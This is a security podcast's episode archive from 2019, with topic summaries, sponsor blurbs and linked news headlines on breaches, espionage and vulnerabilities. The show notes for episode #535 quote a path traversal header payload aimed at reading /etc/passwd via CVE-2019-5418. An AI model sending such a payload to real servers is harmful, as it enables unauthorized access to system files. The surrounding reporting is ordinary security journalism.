Risky Business #537 -- Assange arrested, WordPress ecosystem on fire

Apr 17, 2019


On this week’s show Adam Boileau and Patrick Gray discuss the week’s security news:

Julian Assange arrested, likely to be extradited to the USA Krebs: Breach at outsourcing firm Wipro WordPress 0day drama causing serious headaches Silk Road 2’s “DPR2” sent to slammer More from Kaspersky SAS

This week’s show is brought to you by Thinkst Canary! Thinkst founder Haroon Meer will be along in this week’s show to talk about the effect venture capital is having on the security ecosystem. He thinks VC money often makes weak ideas look strong, and in a market where it’s quite difficult to make informed purchasing decisions, that’s not a good thing.

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Breaking Down the Julian Assange Hacking Case | WIRED Experts: Breach at IT Outsourcing Giant Wipro — Krebs on Security Silk Road 2 Founder Dread Pirate Roberts 2 Caught, Jailed for 5 Years - Motherboard Chinese woman arrested at Mar-a-Lago 'up to something,' denied bail: judge - Reuters A security researcher with a grudge is dropping Web 0days on innocent users | Ars Technica Mailgun hacked part of massive attack on WordPress sites | ZDNet PPD-20 successor has yielded ‘operational success,’ Federal CISO says A Peek Into the Toolkit of the Dangerous 'Triton' Hackers | WIRED DHS, FBI say election systems in all 50 states were targeted in 2016 | Ars Technica Quasi-Russian upstart reportedly targeted Ukraine in cyber-espionage campaign Patrick Gray 🥚 on Twitter: "Great scoop from @Commsday Looks like @ASDGovAu is going to rip up its contract with @Cloudflare because they host Nazi forums.…" Dragonblood vulnerabilities disclosed in WiFi WPA3 standard | ZDNet Confluence Security Advisory - 2019-03-20 - Atlassian Documentation A New Breed of ATM Hackers Gets in Through a Bank’s Network | WIRED Mysterious Hackers Hid Their Swiss Army Spyware for 5 Years | WIRED Kaspersky: 70 percent of attacks now target Office vulnerabilities | ZDNet EU: No evidence of Kaspersky spying despite 'confirmed malicious' classification | ZDNet DHS alerts industry to insecure enterprise VPN apps Shimo VPN service contains six unpatched vulnerabilities, Talos discovers ‘Land Lordz’ Service Powers Airbnb Scams — Krebs on Security Hackers publish personal data on thousands of US police officers and federal agents | TechCrunch Former Senate IT intern admits to doxing US senators on Twitter and Wikipedia | ZDNet A hacker has dumped nearly one billion user records over the past two months | ZDNet Google DLP Makes It Easier to Safeguard Sensitive Data Troves | WIRED Microsoft Email Hack Shows the Lurking Danger of Customer Support | WIRED Fortinet settles charges of selling intentionally mislabeled Chinese-made tech to U.S. military Security Engineer, Detection - Google - Sydney NSW, Australia - Google Careers Security Engineer, Information Security and Privacy Incident Response - Google - Sydney NSW, Australia - Google Careers Thinkst Canary

Risky Business #536 -- Mar-a-Lago arrest, ASUS supply chain attack and more

Apr 10, 2019


In this week’s show Patrick Gray and Adam Boileau recap all the infosec news of the last three weeks, including:

Chinese woman arrested at Mar-a-Lago being very shady The ASUS supply chain attack Flame-related malware lived on longer than expected boostrap-sass Ruby gem backdoored Latest on Norsk Hydro and other victims of the same crew More trouble at Toyota Huawei spanked by UK oversight panel Exodus govvie malware affects Android and iOS Plus much, much more

This week’s sponsor interview is with Kumud Kalia, the Chief Information and Technology Officer of Cylance. They actually dropped a really interesting product announcement at RSA a few weeks back and Kumud will be along later on to tell us about that. The tl;dr it’s an agent that models endpoint behaviour so when someone - or something - else starts using that endpoint to do things that don’t fit the user profile, action can be taken.

It’s the type of tech concept that normally belongs in academic papers, not in actual products people can actually buy. That’s an interesting chat.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Feds: Woman arrested at Mar-a-Lago had hidden-camera detector | Miami Herald Hackers Hijacked ASUS Software Updates to Install Backdoors on Thousands of Computers - Motherboard ASUS releases fix for Live Update tool abused in ShadowHammer attack | ZDNet Researchers publish list of MAC addresses targeted in ASUS hack | ZDNet Nation-state hacking kit ‘Flame’ had a second life, researchers say Malicious remote code execution backdoor discovered in the popular bootstrap-sass Ruby gem | Snyk Norsk Hydro ransomware incident losses reach $40 million after one week | ZDNet Norsk Hydro will not pay ransom demand and will restore from backups | ZDNet Arizona Beverages knocked offline by ransomware attack | TechCrunch Ransomware Forces Two Chemical Companies to Order ‘Hundreds of New Computers’ - Motherboard Toyota announces second security breach in the last five weeks | ZDNet Huawei's Problem Isn't Chinese Backdoors. It's Buggy Software | WIRED HCSEC_OversightBoardReport-2019.pdf In issuing 5G recommendations, E.U. spurns U.S. hardline on Huawei Bezos’ Investigator Gavin de Becker Finds the Saudis Obtained the Amazon Chief’s Private Data NSO Group Says It Didn’t Hack Jeff Bezos On Behalf of Saudi Arabia - Motherboard 'Exodus' Spyware Posed as a Legit iOS App | WIRED Former NSA spies hacked BBC host, Al Jazeera chairman for UAE Lazarus rises in Israel with attempted hack of defense company, researchers say Defense Ministry rebukes Israeli spy tech company for unlawful exports | The Times of Israel Islamic State's collapse hastened with help of Australian cyber spies - ABC News (Australian Broadcasting Corporation) Company sues worker who fell for email scam - BBC News Utah Just Became a Leader in Digital Privacy | WIRED Office Depot rigged PC malware scans to sell unneeded $300 tech support | Ars Technica Microsoft warns Windows 7 users of looming end to security updates | TechCrunch Brace yourselves: Exploit published for serious Magento bug allowing card skimming [Updated] | Ars Technica Warfare Plugins on Twitter: "WE ARE AWARE OF A ZERO-DAY EXPLOIT AFFECTING SOCIAL WARFARE CURRENTLY BEING TAKEN ADVANTAGE OF IN THE WILD. Our developers are working to release a patch within the next hour. In the meantime, we recommend disabling the plugin. We will update you as soon as we know more." Pipdig Update: Dishonest Denials, Erased Evidence, and Ongoing Offenses Two serious WordPress plugin vulnerabilities are being exploited in the wild | Ars Technica Ex-NSA contractor pleads guilty to vast classified data leak, faces 9 years in prison Report deems Russia a pioneer in GPS spoofing attacks | ZDNet Above Us Only Stars - Exposing GPS Spoofing in Russia and Syria - Association of Old Crows Researchers find 36 new security flaws in LTE protocol | ZDNet AT&T, Comcast successfully test SHAKEN/STIR protocol for fighting robocalls | ZDNet Facebook Stored Hundreds of Millions of User Passwords in Plain Text for Years — Krebs on Security Third-Party Apps Exposed Over 540 Million Facebook Records | WIRED Man Behind Fatal ‘Swatting’ Gets 20 Years — Krebs on Security Top dark web marketplace will shut down next month | ZDNet Lithuanian man pleads guilty to scamming Google and Facebook out of $123 million | ZDNet China Considers Ban On Cryptocurrency Mining Because It's A Stupid Waste Of Energy | Gizmodo Australia Vigilantes Counter Christchurch Manifesto with Weaponized Version RedTeam Pentesting on Twitter: "We were also quite surprised to find this /etc/nginx.conf in…" Announcing QueryCon 2019 | Trail of Bits Blog - QueryCon 2019 QueryCon 2019 — Hosted by Trail of Bits, with Kolide and Carbon Black Tickets, Thu, Jun 20, 2019 at 9:00 AM | Eventbrite

Risky Biz Soap Box: All about WebAuthn with Duo Security

Apr 2, 2019


This is a wholly sponsored podcast brought to you by Duo Security.

WebAuthn is a new multifactor authentication standard for the web that is all rooted in very smart encryption tech. Some of you would already be using similar authentication standards in apps without even thinking about it, like doing biometric authentication in your banking apps. You want to log in via your app and it scans your face to auth you, that sort of thing. WebAuthn makes those types of authentication actions available to users through the browser.

It’s now an official W3C standard supported by most browsers. It’s the future of auth on the Web.

Duo Security has been involved a little bit with the standards process and in this edition of the Soap Box podcast you’re going to hear a nearly hour long conversation between myself, Nick Steele and James Barclay who are Duo’s resident Webauthn dudes at Duo Labs.

I hope you enjoy this conversation.

Show notes Touch ID and Beyond: Duo’s Plans for WebAuthn | Duo Security Guide to Web Authentication GitHub - duo-labs/android-webauthn-authenticator: A WebAuthn Authenticator for Android leveraging hardware-backed key storage and biometric user verification. Web Authentication: An API for accessing Public Key Credentials Level 1

Risky Business #535 -- Stop giving Cloudflare money

Mar 20, 2019


In this week’s show Patrick Gray and Alex Stamos discuss the week’s news, as well as discussing the rise of white supremacist communities and propaganda on the Internet and what can be done about it.


Norsk Hydro ransomwared Huawei ban gets more and more political APT40 hitting USA hard Cyber Command’s Euro road-trip Kremlin interference in EU elections extremely likely US Senators seek information on breaches targeting them Cloudflare won’t pull service from 8chan in wake of NZ attack Beto O’Rourke was cDc member New Mirari variant 150 million Android devices hosed by new malware Much, much more

This week’s show is brought to you by Chronicle Security! We’ll be joined by Chronicle co-founders Shapor Naghibzadeh and Mike Wiacek. They had a tremendously successful launch at RSA and they’re going to pop in to tell us about some near future plans they have for their Backstory product.

Links to everything are below, and you can follow Patrick or Alex on Twitter if that’s your thing.

Show notes Norsk Hydro Ransomware Attack Is `Severe' But All Too Common - Bloomberg Antivirus scan for c97d9bbc80b573bdeeda3812f4d00e5183493dd0d5805e2508728f65977dda15 at 2019-03-19 12:37:54 UTC - VirusTotal When Facebook Goes Down, Don't Blame Hackers | WIRED U.S. Campaign to Ban Huawei Overseas Stumbles as Allies Resist - The New York Times Navy, Industry Partners Are ‘Under Cyber Siege’ by Chinese Hackers, Review Asserts - WSJ Tim Watts MP on Twitter: "In a rambling and incoherent Op-Ed today, Barnaby Joyce, our former Deputy Prime Minister make a unilateral attribution of the recent incursions into Australia’s Parliamentry IT systems. The Morrison govt has not publicly attributed these incursions.…" March for something that’s truly under threat: Western democracy Cyber Command’s midterm election work included trips to Ukraine, Montenegro, and North Macedonia Kremlin interference in EU vote is likely, says Estonian spy agency Report: Tech Company In Steele Dossier May Have Been Used To Support DNC Hack US senators want to know how many times they've been hacked | ZDNet After The New Zealand Terror Attack, Here’s Why 8chan Won’t Be Wiped From The Web How Right-Wing Social Media Site Gab Got Back Online | WIRED Parliament TV and Radio - New Zealand Parliament Facebook trolls and scammers from Kosovo are manipulating Australian users - ABC News (Australian Broadcasting Corporation) Optus, Telstra, Vodafone Block 8chan, 4chan For Christc... | 10 daily Dutton Wants To Rehash The Video Game Violence Debate After The NZ Attack Facebook failed to block 20% of uploaded New Zealand shooter videos | TechCrunch Beto O’Rourke’s secret membership in America’s oldest hacking group 'Make money work for me': Sydney man charged with stealing $100,000 via phone porting A huge trove of medical records and prescriptions found exposed | TechCrunch New Mirai malware variant targets signage TVs and presentation systems | ZDNet Microsoft releases Application Guard extension for Chrome and Firefox | ZDNet North Korean diplomats in Spain: CIA implicated in attack on North Korean embassy in Madrid | In English | EL PAÍS Dissidents behind raid on N.Korea Madrid embassy: US paper - The Local Almost 150 million users impacted by new SimBad Android adware | ZDNet Most Android Antivirus Apps Are Garbage | WIRED Nasty WinRAR bug is being actively exploited to install hard-to-detect malware | Ars Technica Proof-of-concept code published for Windows 7 zero-day | ZDNet Malicious Counter-Strike 1.6 servers used zero-days to infect users with malware | ZDNet “Yelp, but for MAGA” turns red over security disclosure, threatens researcher | Ars Technica Local privilege escalation via the Windows I/O Manager: a variant finding collaboration – Security Research & Defense iblue on Twitter: "So, that's CVE-2019-5418. Accept: ../../../../../../../../../etc/passwd (And we might see more fun involving the PathResolver in the future :))…" CVE‌-2019-7644: How Does this Happen? Chronicle Security - Careers

Risky Business #534 -- Manning back in clink, automotive industry under attack

Mar 13, 2019


On this week’s show Adam Boileau and Patrick Gray discuss the week’s news:

Chelsea Manning back in jail Citrix owned, Resecurity claims it was Iran. Again. Because reasons, apparently. Huawei politics get messy EXCLUSIVE: Toyota Oz, other carmakers likely targeted by APT32 (Vietnam) Much, much more

This week’s sponsor is Senetas. They make layer 2 encryption gear but recently made a US$8m investment into Votiro, a Content Disarm and Reconstruction (CDR) play. Votiro CEO Aviv Grafi is this week’s sponsor guest. He stops by to explain CDR tech.

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Chelsea Manning jailed after refusing to testify about WikiLeaks - CNNPolitics Citrix discloses security breach of internal network | ZDNet Citrix investigating unauthorized access to internal network | Citrix Blogs Iranian-backed hackers stole data from major U.S. government contractor Deacon Blues on Twitter: "Have about closed the loop on who is behind Resecurity, the mysterious company attributing the Citrix hack to Iran. It seems to be the work of one man, Andrey Andreevich Komarov, aka Andrew Komarov.…" US ambassador in Berlin urges Germany to cut ties with Huawei Pompeo warns allies Huawei presence complicates partnership with U.S. | Reuters Huawei’s 5G equipment is a manageable risk, British intelligence claims - The Verge UN report links North Korean hackers to theft of $571 million from cryptocurrency exchanges China database lists 'breedready' status of 1.8 million women | World news | The Guardian 800+ Million Emails Leaked Online by Email Verification Service - Security Discovery Releasing the NSA’s Previously Classified Tool ‘Ghidra’ For Free Is a ‘Game Changer’ - Motherboard Facebook Suit: Ukrainian Hackers Used Quizzes to Take Data from 60,000 Users A world of hurt after GoDaddy, Apple, and Google misissue >1 million certificates | Ars Technica The Prototype iPhones That Hackers Use to Research Apple’s Most Sensitive Code - Motherboard Google reveals Chrome zero-day under active attacks | ZDNet Pipes on Twitter: "Google TAG have run down and identified iOS, Chrome and Windows 0days in the last few weeks. @ShaneHuntley Are we going to get some insight on which group you folk are pulling apart later? Sounds like fun times 😉" Russia blocks encrypted email provider ProtonMail | TechCrunch Tufts expelled a student for grade hacking. She claims innocence | TechCrunch Lamborghini-driving bitcoin trader charged with drug trafficking Cryptocurrency entrepreneur pleads guilty in 'Bitcointopia' fraud - Los Angeles Times Car alarms with security flaws put 3 million vehicles at risk of hijack | TechCrunch Silencing Cylance: A Case Study in Modern EDRs – MDSec Glitching Trezor using EMFI Through The Enclosure – Colin O’Flynn Extracting BitLocker keys from a TPM WDS bug lets hackers hijack Windows Servers via malformed TFTP packets | ZDNet Cisco tells Nexus switch owners to disable POAP feature for security reasons | ZDNet Auth0 Security Bulletin CVE-2019-7644 Votiro Disarmer Takes Cyber Security to the Next-Generation Senetas announces $8m investment in Votiro Disarmer

Risky Business #533 -- Ghidra release, NSA discontinues metadata program and more

Mar 6, 2019


On this week’s show Adam Boileau and Patrick Gray discuss the week’s news:

The NSA isn’t that interested in phone metadata anymore More Chinese mass surveillance data leaks Chelsea Manning, David House subpoenaed over Wikileaks Quadriga cold wallets were actually empty at time of founder’s death NSA deployed “rm -rf / shark” at Internet Research Agency HackerOne follows Bugcrowd into pentesting NSA releases Ghidra Much, much more!

This week’s sponsor interview is with Chris Kennedy, AttackIQ’s CISO and VP of customer success. And we’ll be talking about a few things really, like about how continuous validation of security controls like monitoring is a good thing. Everyone uses software like Tenable to verify patching, why not do the same for your monitoring?

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes The NSA has reportedly stopped data-mining Americans' phone and SMS records / Boing Boing House aide: NSA has shut down phone call record surveillance | Ars Technica China’s “democracy” includes mandatory apps, mass chat surveillance | Ars Technica China claims detained Canadians formed spy link As Trump and Kim Met, North Korean Hackers Hit Over 100 Targets in U.S. and Ally Nations - The New York Times Disclosing Subpoena for Testimony, Chelsea Manning Vows to Fight - The New York Times WikiLeaks Veteran: I ‘Cooperated’ With Feds ‘in Exchange for Immunity’ Mystery as Quadriga crypto-cash goes missing - BBC News NSA’s top policy advisor: It’s time to start putting teeth in cyber deterrence | Ars Technica US wiped hard drives at Russia's 'troll factory' in last year's hack | ZDNet Vulnerability exposes location of thousands of malware C&C servers | ZDNet Former Hacking Team Members Are Now Spying on the Blockchain for Coinbase - Motherboard Coinbase Says Ex-Hacking Team Members Will ‘Transition Out’ After Users Protest - Motherboard HackerOne thinks its freelance hackers can conduct penetration tests better than actual pentesting companies New Software Helps to Mitigate Supply Chain Management Risk > National Security Agency | Central Security Service > Article View Ghidra Hacker Fantastic on Twitter: "Ghidra opens up JDWP in debug mode listening on port 18001, you can use it to execute code remotely 🤦‍♂️.. to fix change line 150 of support/ from * to" Backstory: An Alphabet Moon Shot Wants to Store the Security Industry's Data | WIRED BlackBerry Cylance Delivers First Proactive Behavioral Analytics Solution with CylancePERSONA Martijn Grooten on Twitter: "Shamir is of course right in his criticism of strict US visa procedures, but to add a sobering perspective, we have had speakers who couldn't get a visa when we had our conference in the US, Canada and the EU. For most of the world, visas for the West are really hard.…" W3C finalizes Web Authentication (WebAuthn) standard | ZDNet Hackers have started attacks on Cisco RV110, RV130, and RV215 routers | ZDNet Researchers uncover ring of GitHub accounts promoting 300+ backdoored apps | ZDNet Google Reveals "BuggyCow," a Rare MacOS Zero-Day Vulnerability | WIRED Adobe releases out-of-band update to patch ColdFusion zero-day | ZDNet PoC Buffer Overflow exploitation in the British Airways Entertainment System | LinkedIn

Risky Biz Soap Box: PRODUCT LAUNCH: Backstory by Alphabet's Chronicle

Mar 4, 2019


In this edition of the show we’re playing a small part in Chronicle’s launch of its flagship product, Backstory.

Chronicle is of course the security spinoff of Google’s parent company, Alphabet. The launch of Chronicle itself was announced about a year ago, but until now it’s only really had one product: Virus Total Enterprise. That all changed today when Chronicle launched Backstory at the RSA conference in the USA.

I was lucky enough to see a demo of Backstory before we recorded this interview last week, and I’m going to characterise it in a way that Chronicle probably won’t like, but it’s basically a cloud-SIEM, albeit a very good one.

Backstory ingests logs from a bunch of data sources – DNS lookup information, DHCP info, your EDR logs (from your Crowdstrike or Carbon Black software), web proxy logs, firewall alerts – and then it structures this stuff so you can make use of it. You get nice pointy-clicky timelines and useful visualisations. That’s handy enough, but keep in mind your logs are now with the company that is responsible for Virus Total. They have some pretty good intel, and they can now apply various IOCs to the logs you’ve submitted.

So one obvious use case for Backstory is doing the type of threat hunting threat hunters like to do, but beyond that, this is likely going to become a pretty useful alerting platform.

Show notes Chronicle launches Backstory

Risky Business #532 -- A big week of research and tech news

Feb 28, 2019


On this week’s show Adam and Patrick discuss the week’s security news:

Cyber Command kicks the IRA off the Internet on election day WSJ reporting on Iran vs Australia likely incorrect Two Russian cybersecurity professionals sentenced over treason DPRK spearphishing US summit participants LOTS of technical news and research this week

This week’s show is brought to you by Remediant. Their CEO Tim Keeler will be along in this week’s sponsor segment to talk about how they’re doing “virtual directory binding” to make managing Linux accounts via Active Directory less traumatic. If you’re struggling with horrible, horrible PAM solutions in your devops environments have a listen to that one.

*** NOTE FROM PAT: I made some mistakes in the recording phase of this week’s show. As a result, my vocal audio is pretty atrocious. Sorry! ***

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Cyber Command put the kibosh on Russian trolls during the midterms Iranian Group Blamed for Cyberattack on Australia’s Parliament - WSJ China, not Iran, still the main suspect in hacking of Australia's political parties, say sources Former Russian Cybersecurity Chief Sentenced to 22 Years in Prison — Krebs on Security North Korean hackers go on phishing expedition before Trump-Kim summit Supermicro hardware weaknesses let researchers backdoor an IBM cloud server | Ars Technica The Missing Security Primer for Bare Metal Cloud Services – Eclypsium The secret lives of Facebook moderators in America - The Verge CRXcavator: Democratizing Chrome Extension Security | Duo Security CRXcavator Toyota Australia says no customer data taken in attempted cyber attack | Business | The Guardian Toyota Australia hack update | Automotive Industry News | just-auto Many websites threatened by highly critical code-execution bug in Drupal | Ars Technica It took hackers only three days to start exploiting latest Drupal bug | ZDNet Former Hacking Team Members Are Now Spying on the Blockchain for Coinbase - Motherboard attachment.cgi For many crooks, malware is out and PowerShell attacks are in, IBM says New flaws in 4G, 5G allow attackers to intercept calls and track phone locations | TechCrunch Cryptocurrency wallet caught sending user passwords to Google's spellchecker | ZDNet POS firm says hackers planted malware on customer networks | ZDNet Surveillance firm asks Mozilla to be included in Firefox's certificate whitelist | ZDNet New browser attack lets hackers run bad code even after users leave a web page | ZDNet WinRAR versions released in the last 19 years impacted by severe security flaw | ZDNet Dow Jones’ watchlist of 2.4 million high-risk clients has leaked | TechCrunch Intel open-sources HBFA app to help with firmware security testing | ZDNet Thunderclap flaws impact how Windows, Mac, Linux handle Thunderbolt peripherals | ZDNet Spain investigates raid on North Korean embassy: sources | Reuters Conference | 0xCC | Melbourne

Risky Business #531 -- Australia's political parties targeted, the Witt indictment and more

Feb 20, 2019


Adam Boileau is along this week to discuss the week’s security news, which also features comment from Dmitri Alperovitch, Klon Kitchen and The Grugq. We cover:

Former USAF counterintelligence official indicted over spearphishing, leaking secrets Australia’s major political parties targeted by APT crew that totally isn’t Chinese. (It’s Chinese) More on the Iran DNS hijacks Venezuelans phished by their own government China’s mass surveillance of Uyghur Muslims laid bare in data leak Millions of Swedes have their healthcare help-line calls exposed Bank of Valletta dodges a bullet, catches fraudulent transfers VK gets Samy’d Calls for GDPR-like law in USA Marcus “Malwaretech” Hutchins has a bad week

This week’s sponsor interview is with Jason Haddix of Bugcrowd. He’ll be along to talk a little more about what Bugcrowd calls next-generation pentests. They claim one of their tests is sufficient for compliance purposes under PCI, ISO or NIST and they’ve had a third party auditor prove that for them. They also say the service has really taken off despite being launched only a couple of months ago.

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Air Force Defector to Iran Severely Damaged U.S. Intelligence Efforts, Ex-Officials Say - The New York Times Spy Betrayed U.S. to Work for Iran, Charges Say - The New York Times Game of Thrones hacker worked with US defector to hack Air Force employees for Iran | ZDNet Scott Morrison details cyber attack on Australia's major political parties How China and Russia are readying themselves for a US cyber war Chinese traders freeze Australian coal orders amid 40-day customs delays: sources | Reuters A Deep Dive on the Recent Widespread DNS Hijacking Attacks — Krebs on Security Albania expels Iranian diplomats on national security grounds | Reuters Venezuela’s Government Appears To Be Trying to Hack Activists With Phishing Pages - Motherboard China's mass surveillance of Uyghur Muslims in Xinjiang province revealed in data security flaw - ABC News (Australian Broadcasting Corporation) Millions of calls to Swedish healthcare hotline left unprotected online - The Local Hackers tried to steal €13 million from Malta's Bank of Valletta | ZDNet State of the Hack S2E01: #NoEasyBreach REVISITED « State of the Hack S2E01: #NoEasyBreach REVISITED | FireEye Inc Russian hackers 8 times faster than Chinese, Iranians, North Koreans, says report White hats spread VKontakte worm after social network doesn't pay bug bounty | ZDNet You Don't Get To Learn How The FBI Tried To Crack Facebook Messenger Encryption, Judge Rules | Gizmodo Australia GAO gives Congress go-ahead for a GDPR-like privacy legislation | ZDNet NSO Group founders buy back their spyware company MalwareTech loses bid to suppress damning statements made after days of partying | Ars Technica Researchers hide malware in Intel SGX enclaves | ZDNet Google Play Store app rejections up 55% from last year, app suspensions up 66% | ZDNet Behold, the Facebook phishing scam that could dupe even vigilant users | Ars Technica (20) Facebook Popup Phishing Page (Social Login) - YouTube Google backtracks on Chrome modifications that would have crippled ad blockers | ZDNet Scammers Are Filing Fake Trademarks to Steal High-Value Instagram Accounts - Motherboard Google working on new Chrome security feature to 'obliterate DOM XSS' | ZDNet Microsoft patches 0-day vulnerabilities in IE and Exchange | Ars Technica Apple is forcing 2FA on iOS and macOS developers Apple being sued because two-factor authentication on an iPhone or Mac takes too much time Forced Two Factor Auth Will Cause Issues |Apple Developer Forums Aspen Tech Policy Hub - A Silicon Valley-Style Think Tank Next Gen Pen Testing

Risky Business #530 -- UAE's Project Raven, Bezosgate and more

Feb 12, 2019


Adam Boileau is back in the news seat this week. We talk about:

Amazing Reuters report on UAE’s “Project Raven” Bezos’ dick pics, Saudi Arabia and a creepy brother US government security staffers play post-shutdown catch-up Krebs: National Credit Union Administration probably pwned Russia to test complete disconnection from wider Internet China suspected of involvement in Australian parliament hack Trump likely to ban all Chinese telco equipment makers from US builds Lasers Google: iOS privesc 0days were in wild $145m in cryptocurrency lost forever due to exchange CEO death VFEmail has a very bad day Facebook/Apple cert wars MORE

This week’s show is brought to you by AustCyber, a nonprofit funded by grants from the Australian government. Its goal is to promote Australia’s cybersecurity industry.

AustCyber CEO Michelle Price will be along in this week’s sponsor interview to tell us all about what they’ve got planned for RSA.

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Special Report - Inside the UAE’s secret hacking team of U.S. mercenaries | Reuters Project Raven: What Happens When U.S. Personnel Serve a Foreign Intelligence Agency? - Lawfare No thank you, Mr. Pecker – Jeff Bezos – Medium Mistress’ Brother Leaked Bezos’ Racy Texts to Enquirer, Sources Say Bezos Could Put National Enquirer Brass in Jail Cybersecurity Workers Scramble to Fix a Post-Shutdown Mess | WIRED Phishers Target Anti-Money Laundering Officers at U.S. Credit Unions — Krebs on Security Russia to disconnect from the internet as part of a planned test | ZDNet China link possible in cyber attack on Australian Parliament computer system, ABC understands - ABC News (Australian Broadcasting Corporation) Trump likely to sign executive order banning Chinese telecom equipment next week - POLITICO Huawei Sting Offers Rare Glimpse of U.S. Targeting Chinese Giant - Bloomberg China's cybersecurity law update lets state agencies 'pen-test' local companies | ZDNet Google warns about two iOS zero-days 'exploited in the wild' | ZDNet $145 million funds frozen after death of cryptocurrency exchange admin | ZDNet Hackers wipe US servers of email provider VFEmail | ZDNet Zcash cryptocurrency fixes infinite counterfeiting vulnerability | ZDNet Biohackers Encoded Malware in a Strand of DNA | WIRED Google releases Chrome extension that alerts users of breached passwords | Ars Technica Big Telecom Sold Highly Sensitive Customer GPS Data Typically Used for 911 Calls - Motherboard Hundreds of Bounty Hunters Had Access to AT&T, T-Mobile, and Sprint Customer Location Data for Years - Motherboard How Hackers and Scammers Break into iCloud-Locked iPhones - Motherboard Apple restores Facebook’s ability to run internal iOS apps - The Verge New TLS encryption-busting attack also impacts the newer TLS 1.3 | ZDNet Atlassian leads encryption law revolt as Peter Dutton stands firm Australian government clamping down on security research, academic says - Computerworld Swiss government invites hackers to pen-test its e-voting system | ZDNet Indecent disclosure: Gay dating app left “private” images, data exposed to Web (Updated) | Ars Technica AustCyber supports the development of a vibrant and globally competitive cyber security sector | AustCyber

Risky Biz Soap Box: Polyswarm builds a marketplace for AV engines

Feb 7, 2019


As regular listeners know, this isn’t the regular weekly Risky Business podcast, all Soap Box podcasts are paid promotions. We ran 10 of these last year, we’re running more of them this year – the total number is up to 14, but we’re running fewer of our other promotional podcast Snake Oilers.

In this Soap Box podcast we’re chatting with a company with a legitimately fascinating origin story.

You remember how in 2017 and 2018 people were running all these shonky initial coin offerings where they’d sell off millions of dollars of crypto tokens on the basis of a two minute video and a whitepaper? What happened in a lot of these cases is after the ICO the founders would take the money, launder it and move to the Bahamas.

Well, Polyswarm raised its money in an ICO. About $26m US dollars (!!). And, because they weren’t mainlining the ICO Kool-Aid, they cashed out about half of what they raised into real money before cryptocurrency values crashed.

Instead of moving to the Bahamas, they actually stuck around to build the business that tokenholders had chosen to fund. Their token value has crashed like everyone else’s has, but that doesn’t matter – they’re funded, and because of their unconventional funding source they don’t have a whole bunch of venture capitalists breathing down their neck.

So, what’s the business? It’s a marketplace for threat detection. Yes, my pinned tweet says “I do not want your blockchain expert as a guest on my podcast,” and yes, this company does use blockchain fairy dust, but as you’ll hear, the blockchain element to this business isn’t really what it’s about. Indeed, the founder and CEO of Polyswarm, Steve Bassi, says he would find life a lot easier in many ways if they weren’t actually using blockchain tech here as a marketplace enabler. He’s also banned himself from ever attending a blockchain conference again in his life.

Ok, so what is the Polyswarm marketplace and how does it work. As you’ll hear in this interview it took me a bit to actually understand exactly what they’re doing here, but what they’ve essentially built is a marketplace for AV. The best way to explain this is to just explain how it works. If you’re an enterprise client or an MSSP you can submit a sample to this marketplace. You’re submitting it with a question – is this file bad or good – and you attach a tokenised value to the answer.

On the other side of the equation are all these AV engines. Big ones, small ones… even tiny little micro engines that are only good at detecting very niche threats. So the enterprise submits the sample – that can be a whole file or just a hash – and it gets distributed to all the people who are running these AV engines. They scan the file, and if they’re super confident on an answer, they return that answer as well as a tokenised stake as a measure of their confidence. The idea is you can have a competitive marketplace for threat detection in which even niche players can participate. Polyswarm CEO Steve Bassi joined me to talk me through the whole concept.

Show notes Enterprise Clients - PolySwarm PolySwarm (NCT) - All information about PolySwarm ICO (Token Sale) - ICO Drops

Risky Business #529 -- Special guest Rob Joyce, NSA

Feb 5, 2019


There’s no news segment in this week’s show. Instead, you’re going to hear a long-form feature interview I did with the NSA’s Rob Joyce.

Rob is probably best known for his tenure as special assistant to the president on cybersecurity and for being the cybersecurity coordinator on the US National Security Council.

He also served as acting homeland security advisor to Donald Trump for a short time following the departure of Tom Bossert from the Whitehouse. In May last year he went back to NSA where he now serves as a senior advisor to the director of NSA for Cyber Security strategy.

Some of you may also know Rob for his blockbuster January 2016 conference talk “disrupting nation state hackers” back when he was heading TAO at NSA. Good talk, that one, and it’s on YouTube. (Link below.)

But gradually over the last couple of years Rob has emerged as a sort of friendly-face of NSA, at least as far as the infosec industry is concerned. He’s spoke at DEF CON last year, he often appears at events and on panels and he’s doesn’t seem terrified of actually comment on things.

This is a huge departure from the historical way agencies like NSA handled themselves. But as you’ll hear, Rob sees this new approach as being vital to the NSA’s current-day mission.

Topics covered include:

DoJ indictments of foreign gov hackers 5G networks and Huawei Kaspersky AV Bloomberg’s Supermicro story Software and hardware supply chain security The USG aggressively burning adversary tools

We also have a sponsor interview for you this week with Zane Lackey, the co-founder of Signal Sciences. I guess you’d call these guys “next generation WAF,” more on that later… but Zane will be along a little bit later with some pretty incredible stats on the way security spending has changed over the last year or two. Money is just piling into appsec while spending on some other controls is actually reducing. It’s a sign of change.

Show notes USENIX Enigma 2016 - NSA TAO Chief on Disrupting Nation State Hackers - YouTube CLARK | Cybersecurity Library

Risky Business #528 -- Huawei dinged, epic FaceTime and Exchange bugs

Jan 29, 2019


Adam Boileau co-hosts this week’s Risky Business episode. We talk about:

The Huawei indictments The epic Facetime logic bug The even more epic Exchange privesc bug CISA’s “fix yo DNS” directive Black Cube busted doing shady stuff to Citizen Lab Yahoo shareholder lawsuit settlement makes directors twitchy Internet filtering kicks off in Venezuela Much, much MORE!

This week’s show is brought to you by Thinkst Canary – they make hardware honeypots and the tools you need to deploy canarytokens at scale. They also make virtual honeypots! This week Thinkst’s founder Haroon Meer will be along to wave his finger at basically all of us over what he sees as the security discipline’s tendency to not really learn anything from security conferences. It’s “contertainment,” he says, followed by “GET OFF MY LAWN”.

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

